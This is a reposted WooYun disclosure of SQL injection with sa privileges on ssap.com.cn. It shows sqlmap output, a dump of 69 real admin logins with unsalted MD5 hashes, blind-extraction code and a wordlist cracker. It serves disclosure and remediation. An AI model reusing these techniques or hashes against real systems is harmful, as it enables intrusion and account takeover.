
Vulnerability summary

Defect ID: wooyun-2014-076084

Title: SQL injection at Social Sciences Academic Press (社会科学文献出版社), with sa privileges

Vendor: ssap.com.cn

Author: Martial

Submitted: 2014-09-15 14:13

Fixed: 2014-10-30 14:14

Published: 2014-10-30 14:14

Type: SQL injection

Severity: High

Self-assessed rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-09-15: Details sent to the vendor; awaiting vendor action
2014-09-15: Vendor confirmed; details visible to the vendor only
2014-09-25: Details disclosed to core white hats and domain experts
2014-10-05: Details disclosed to regular white hats
2014-10-15: Details disclosed to intern white hats
2014-10-30: Details disclosed to the public

Brief description:

sa privileges

Details:

Injection point:
http://www.ssap.com.cn/SKWX/Job_list.aspx?type=1
First a rough check with WebCruiser:

1.jpg


Cross-database access is possible.
Then used sqlmap to dump the specific tables and data:

2.jpg


available databases [24]:
[*] BH_CMS_v4.1
[*] BH_SSAP_EN
[*] fll
[*] fll_new
[*] master
[*] model
[*] msdb
[*] new524
[*] pishu
[*] pishuDB
[*] ReportServer
[*] ReportServerTempDB
[*] ssap_20131021
[*] ssap_new
[*] ssap_new_DB
[*] ssap_new_DB(0427)
[*] ssap_new_test1
[*] ssap_temp
[*] ssdph_new
[*] tempdb
[*] test
[*] test_6-21
[*] ttttt
[*] vote
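The mechanics behind the `type=1` injection point, as an added example that is not part of the original report: the vulnerable concatenation, the parameterized form that closes it, and the Boolean-blind loop that recovers an `Admin_Pwd` value one hex digit at a time through the job listing (the loop sqlmap automated above). The real target is SQL Server; this example runs against an in-memory SQLite database so it works offline, with a constructed `jobs` table and a one-row `T_BHC_Admin` using the column names from the dump. The `jobs` table, its columns and all sample rows are assumptions. On SQL Server the same probe would use `SUBSTRING` instead of `substr`, and the cross-database listing above follows from the connection running as `sa`, which no bound parameter fixes; only a least-privileged login does.

```python
import sqlite3

# Constructed stand-in for the tables behind Job_list.aspx and T_BHC_Admin.
# The page's target is SQL Server; SQLite is used here only because it runs
# anywhere. The jobs table and every row below are assumptions for the example.
_SCHEMA = """
CREATE TABLE jobs (id INTEGER PRIMARY KEY, type INTEGER, title TEXT);
INSERT INTO jobs VALUES (1, 1, 'Editor'), (2, 1, 'Proofreader'), (3, 2, 'Sales');
CREATE TABLE T_BHC_Admin (Admin_LogName TEXT, Admin_Pwd TEXT);
INSERT INTO T_BHC_Admin VALUES ('admin', '716E5BC387719C96A9B75BCF78D0C1CB');
"""


def open_db():
    """In-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(_SCHEMA)
    return conn


def list_jobs_vulnerable(conn, type_param):
    """The pattern behind ?type=1: the query-string value is concatenated into
    the SQL text, so '1 AND 1=0' or a subquery is executed as SQL. No quote is
    needed because the parameter is numeric, so quote filtering changes nothing."""
    sql = "SELECT title FROM jobs WHERE type = " + type_param + " ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def list_jobs_parameterized(conn, type_param):
    """Hardened form: validate as an integer, then bind it. The value is data,
    never SQL, whatever it contains."""
    type_id = int(type_param)  # raises ValueError for '1 AND 1=0'
    sql = "SELECT title FROM jobs WHERE type = ? ORDER BY id"
    return [row[0] for row in conn.execute(sql, (type_id,))]


def parameterized_rejects(conn, type_param):
    """True when the hardened query refuses the value instead of running it."""
    try:
        list_jobs_parameterized(conn, type_param)
    except ValueError:
        return True
    return False


HEX_DIGITS = "0123456789ABCDEF"


def blind_extract_hash(conn, login, length=32):
    """Boolean-blind extraction of one Admin_Pwd value through the vulnerable
    query: the job list is non-empty when the guessed hex digit is right and
    empty otherwise. At most 16 requests per digit, 512 for a 32-digit hash."""
    recovered = ""
    for pos in range(1, length + 1):
        for digit in HEX_DIGITS:
            probe = (
                f"1 AND (SELECT substr(Admin_Pwd, {pos}, 1) FROM T_BHC_Admin "
                f"WHERE Admin_LogName = '{login}') = '{digit}'"
            )
            if list_jobs_vulnerable(conn, probe):
                recovered += digit
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {pos}")
    return recovered


if __name__ == "__main__":
    db = open_db()
    print(list_jobs_vulnerable(db, "1"))           # normal request
    print(list_jobs_vulnerable(db, "1 AND 1=0"))   # injected condition: empty list
    print(parameterized_rejects(db, "1 AND 1=0"))  # hardened form refuses it
    print(blind_extract_hash(db, "admin"))         # hash recovered digit by digit
```

The two query functions differ only in how `type_param` reaches the SQL engine; that difference is the whole fix for this class, independent of what characters are "dangerous".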
I only dumped one admin table from the first database; the other tables hold a lot more data.

3.jpg


Database: BH_CMS_v4.1
[107 tables]
+------------------------------+
| anonymous.D99_CMD |
| anonymous.D99_REG |
| anonymous.D99_Tmp |
| anonymous.bin_cmd |
| anonymous.kill_kk |
| anonymous.sqlmapoutput |
| anonymous.sysfile1 |
| anonymous.systree |
| CartNoteTable |
| OrderNoteTable |
| T_BHC_Ad |
| T_BHC_Admin |
| T_BHC_AuthorizationKeys |
| T_BHC_AuthorizationUsers |
| T_BHC_CommentsManagement |
| T_BHC_ContentLabel |
| T_BHC_ContentManager |
| T_BHC_Email |
| T_BHC_EmailConfig |
| T_BHC_Form |
| T_BHC_HotWord |
| T_BHC_Hr |
| T_BHC_Hr_Job |
| T_BHC_IPBlackList |
| T_BHC_IPWhiteList |
| T_BHC_Infomation |
| T_BHC_KeyWordsFiltration |
| T_BHC_KindManager |
| T_BHC_Label |
| T_BHC_Link |
| T_BHC_Logs |
| T_BHC_MatchTemplate |
| T_BHC_Menu |
| T_BHC_Pic |
| T_BHC_Relation |
| T_BHC_Role |
| T_BHC_SCSYIMG |
| T_BHC_Template |
| T_BHC_UploadConfig |
| T_BHC_Vote |
| T_BHC_VoteDetailInfo |
| T_BHC_VoteOptionInfo |
| T_BHC_WarterConfig |
| T_BHS_AddValue |
| T_BHS_Alipay |
| T_BHS_Announcement |
| T_BHS_Area |
| T_BHS_AuthorManager |
| T_BHS_Bank |
| T_BHS_BookShelf |
| T_BHS_Carriage |
| T_BHS_CarriageDetail |
| T_BHS_CarriageNew |
| T_BHS_Cart |
| T_BHS_Center |
| T_BHS_City |
| T_BHS_Ebook |
| T_BHS_EbookList |
| T_BHS_EbookSetting |
| T_BHS_EngOrder |
| T_BHS_ExchangeDetails |
| T_BHS_Help |
| T_BHS_KeyCode |
| T_BHS_Logistics |
| T_BHS_Message |
| T_BHS_MessageReplay |
| T_BHS_Order |
| T_BHS_OrderList |
| T_BHS_OrderLog |
| T_BHS_Payment |
| T_BHS_PressManager |
| T_BHS_ProductCommentsManager |
| T_BHS_ProductManager |
| T_BHS_ProductManager_Publish |
| T_BHS_ProductMomentManager |
| T_BHS_ProductProperties |
| T_BHS_ProductTypeManeger |
| T_BHS_ProductUnitManager |
| T_BHS_Province |
| T_BHS_SalesPromotion |
| T_BHS_Task |
| T_BHS_Tips |
| T_BHS_TipsDetail |
| T_BHS_TotalPromotion |
| T_BHS_User |
| T_BHS_VoteLog |
| T_BHS_Voucher |
| T_BHS_WebMessage |
| T_BHV_KindAndContent |
| T_HBC_EmphasesCommend |
| T_LogTemp |
| V_BHS_BookTips |
| V_BHS_Product_Detail_Info |
| V_Content_Kind |
| View_CommentsManager |
| View_dao |
| aaa |
| au_Content |
| comd_list |
| dtest |
| jiaozhu |
| syscommand |
| sysdiagrams |
| tb_Vote |
| tree_tmp1 |
| vote_book |
| vote_catory |
+------------------------------+
Dumped the columns of T_BHC_Admin:
Table: T_BHC_Admin
[13 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| Admin_AddTime | datetime |
| Admin_Answer | varchar |
| Admin_DisName | varchar |
| Admin_Email | varchar |
| Admin_Id | int |
| Admin_KindStr | varchar |
| Admin_LastLogTime | varchar |
| Admin_LogName | varchar |
| Admin_LogTimeNum | int |
| Admin_Pwd | varchar |
| Admin_Question | varchar |
| Admin_RoleId | varchar |
| Admin_State | varchar |
+-------------------+----------+
Then dumped Admin_LogName and Admin_Pwd:
Table: T_BHC_Admin

4.jpg


[69 entries]
+----------------------------------+---------------+
| Admin_Pwd | Admin_LogName |
+----------------------------------+---------------+
| 5C2A1408402C4AE0D181E70E2BE314CB | 00021 |
| 146F7B060850F7D1B2402E518BFFF8ED | 00031 |
| 55587A910882016321201E6EBBC9F595 | 00033 |
| D94BCCA44C6F80EAD0D54C2BAAF5F9B4 | 00034 |
| 716E5BC387719C96A9B75BCF78D0C1CB | admin |
| 792B77B2FA6738E17435B6CAB107ABD4 | admin02 |
| 05A671C66AEFEA124CC08B76EA6D30BB | contest |
| 96E79218965EB72C92A549DD5A330112 | Gison |
| E10ADC3949BA59ABBE56E057F20F883E | guoyong |
| BA30903BC4A3E9D65F9F09A59B2BCF9C | hyh |
| 98D73B056368C44B4609376760C738C0 | jiangmin |
| A95FEECE5F6109A4B1668FEB3CE6AEE9 | lixu2012 |
| CE799224C384AAF05DBA5711846607B5 | qiuqiu |
| 95C168F1F128177545F3C2C700189AEC | scsxs |
| D6E0D63E3EE76856A3CB0E9B1D6164A3 | shixisheng01 |
| E10ADC3949BA59ABBE56E057F20F883E | vote |
| 7C95056948B24EA6FEE3C5EAA4379B2C | wanglinhua |
| 8EF7BFBB7F65E02C775E8F3D26325843 | wangting |
| E10ADC3949BA59ABBE56E057F20F883E | xiaosong |
| 88BDBC044D908B65CDADB3DE02C095C5 | yishuangjian |
| A327590741B453AE63755014CA86B195 | zhongdianyun |
| 9303EF52E4B232086D16A1888CE75D70 | zhouhu |
| E10ADC3949BA59ABBE56E057F20F883E | zly |
| E10ADC3949BA59ABBE56E057F20F883E | 缂栬瘧涓績 |
| E10ADC3949BA59ABBE56E057F20F883E | 璐㈢粡閮� |
| E10ADC3949BA59ABBE56E057F20F883E | 钄$户杈� |
| D783D003A8E5AB0CA6FE840575454C7D | 鏇圭户鐜� |
| E10ADC3949BA59ABBE56E057F20F883E | 闄堝鑾� |
| F5D33835BEAF7B2D5121D2938095A7F2 | 鎴寸惇 |
| E10ADC3949BA59ABBE56E057F20F883E | 鐢靛瓙闊冲儚 |
| E10ADC3949BA59ABBE56E057F20F883E | 娈典含姊� |
| E10ADC3949BA59ABBE56E057F20F883E | 楂樿澊铦� |
| E10ADC3949BA59ABBE56E057F20F883E | 鍏虫櫠鐒� |
| D783D003A8E5AB0CA6FE840575454C7D | 閮媷 |
| E10ADC3949BA59ABBE56E057F20F883E | 鍥介檯涓績 |
| E10ADC3949BA59ABBE56E057F20F883E | 榛勫厓娲� |
| E10ADC3949BA59ABBE56E057F20F883E | 缁忛攢鍟� |
| E10ADC3949BA59ABBE56E057F20F883E | 鏁戞姢閮� |
| E10ADC3949BA59ABBE56E057F20F883E | 鏉庢晱 |
| 4CAA4E23BF71142A84DE833C62F1AD56 | 鏉庨洩鑾� |
| E10ADC3949BA59ABBE56E057F20F883E | 鍒樺痉椤� |
| AFEB42D9F9F45FF335A6CAB8CA8743BC | 鏌虫潹 |
| B4A47B31FA036F3CCAA53E6979D18FBF | 椴佽摀 |
| 72AFF010F7A5064683829056740C540B | 鐗涢粠铏� |
| E10ADC3949BA59ABBE56E057F20F883E | 娼樿緣 |
| 93E953A4C4892E6E18DB4BFCB89E8C1F | 褰悜闃� |
| E10ADC3949BA59ABBE56E057F20F883E | 鐨功涓績 |
| E10ADC3949BA59ABBE56E057F20F883E | 鐨爺涓績 |
| E10ADC3949BA59ABBE56E057F20F883E | 浜哄姏璧勬簮 |
| E10ADC3949BA59ABBE56E057F20F883E | 浜哄姏璧勬簮閮� |
| E10ADC3949BA59ABBE56E057F20F883E | 浜烘枃閮� |
| E10ADC3949BA59ABBE56E057F20F883E | 浠荤孩瀹� |
| E10ADC3949BA59ABBE56E057F20F883E | 浠荤澘鏄� |
| E10ADC3949BA59ABBE56E057F20F883E | 绀剧閮� |
| E10ADC3949BA59ABBE56E057F20F883E | 鏁板瓧鍐呭 |
| EEEF2AA8B6D34E40D8DAB1A6905F7238 | 瀹嬫窇娲� |
| 79C850BF82F8FBCC0344569F63961A28 | 鐜嬫枃闈� |
| 94937509BD53D2B7A64BA5F157E5FF17 | 鐜嬬拠 |
| 96E79218965EB72C92A549DD5A330112 | 鏄熺惔 |
| E10ADC3949BA59ABBE56E057F20F883E | 寰愮劚绾� |
| E10ADC3949BA59ABBE56E057F20F883E | 瀛︽湳涓績 |
| E10ADC3949BA59ABBE56E057F20F883E | 鏄撳缓楣� |
| F5D33835BEAF7B2D5121D2938095A7F2 | 灏归湶闇� |
| E10ADC3949BA59ABBE56E057F20F883E | 鎭借枃 |
| E10ADC3949BA59ABBE56E057F20F883E | 寮犳緞 |
| E10ADC3949BA59ABBE56E057F20F883E | 寮犻潤楦� |
| E10ADC3949BA59ABBE56E057F20F883E | 鍛ㄥ噷娉� |
| F16AC835DBE9306AEF289706A4204702 | 鎬荤紪瀹� |
| E10ADC3949BA59ABBE56E057F20F883E | 閭规瞾鑺� |
+----------------------------------+---------------+
Because I was testing from a virtual machine, the encoding got mangled when the output was transferred here; see the screenshot below.
5.jpg
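Every `Admin_Pwd` value above is 32 hex characters, the shape of a raw, unsalted MD5 digest, and 36 of the 69 rows share `E10ADC3949BA59ABBE56E057F20F883E`, which is MD5 of `123456`; `96E79218965EB72C92A549DD5A330112` (two rows) is MD5 of `111111`. What follows is an added example, not part of the original report, of how an analyst checks a dump like this: a wordlist lookup plus a reuse count, run over a subset of rows copied from the table above. The wordlist is constructed for the example; nothing else is assumed.

```python
import hashlib
from collections import Counter

# A subset of the (Admin_Pwd, Admin_LogName) rows from the T_BHC_Admin dump
# on the page. The wordlist below is constructed for the example.
ADMIN_ROWS = [
    ("716E5BC387719C96A9B75BCF78D0C1CB", "admin"),
    ("792B77B2FA6738E17435B6CAB107ABD4", "admin02"),
    ("96E79218965EB72C92A549DD5A330112", "Gison"),
    ("E10ADC3949BA59ABBE56E057F20F883E", "guoyong"),
    ("E10ADC3949BA59ABBE56E057F20F883E", "vote"),
    ("E10ADC3949BA59ABBE56E057F20F883E", "xiaosong"),
    ("E10ADC3949BA59ABBE56E057F20F883E", "zly"),
    ("8EF7BFBB7F65E02C775E8F3D26325843", "wangting"),
]

WORDLIST = ["123456", "111111", "123123", "12345678",
            "password", "admin", "000000", "888888"]


def is_unsalted_md5_shape(value):
    """32 hex characters: the shape of a raw MD5 digest (no salt, no scheme tag)."""
    return len(value) == 32 and all(c in "0123456789abcdefABCDEF" for c in value)


def md5_hex(word):
    """Uppercase hex MD5 of a UTF-8 string, matching the dump's formatting."""
    return hashlib.md5(word.encode("utf-8")).hexdigest().upper()


def crack_with_wordlist(rows, wordlist):
    """Map login name -> recovered password for every row whose hash is the MD5
    of a wordlist entry. Unsalted, so one digest per word covers every row."""
    lookup = {md5_hex(w): w for w in wordlist}
    return {login: lookup[h.upper()] for h, login in rows if h.upper() in lookup}


def reuse_report(rows):
    """Hash -> number of accounts sharing it. Without a salt, identical hashes
    mean identical passwords, so reuse is visible before anything is cracked."""
    return Counter(h.upper() for h, _ in rows)


def audit(rows, wordlist):
    """Summary an analyst would report for a dumped credential table."""
    cracked = crack_with_wordlist(rows, wordlist)
    shared_hash, shared_count = reuse_report(rows).most_common(1)[0]
    return {
        "rows": len(rows),
        "all_md5_shaped": all(is_unsalted_md5_shape(h) for h, _ in rows),
        "cracked": cracked,
        "most_shared_hash": shared_hash,
        "most_shared_count": shared_count,
    }


if __name__ == "__main__":
    for key, value in audit(ADMIN_ROWS, WORDLIST).items():
        print(f"{key}: {value}")
```

Run against the full 69-row table the same code reports the 36-way reuse of the `123456` hash; the subset above is enough to show why unsalted MD5 turns one weak password into a shared one.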

Proof of vulnerability:

5.jpg

Remediation:

Filter dangerous characters.

Note that `type` is a numeric parameter, so no quote or other "dangerous" character is needed to inject into it; the fix that actually closes it is to validate the value as an integer and pass it to SQL Server as a bound parameter instead of concatenating it. Separately, the application connected as `sa`, which is what made the cross-database listing above possible; it should use a login limited to its own database.

Copyright notice: credit Martial@WooYun when reposting.


Vulnerability response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2014-09-15 14:30

Vendor reply:

Many thanks. We publish a great many books in the humanities and social sciences; if any interest you, we will provide them. Thanks again.

Latest status:

None yet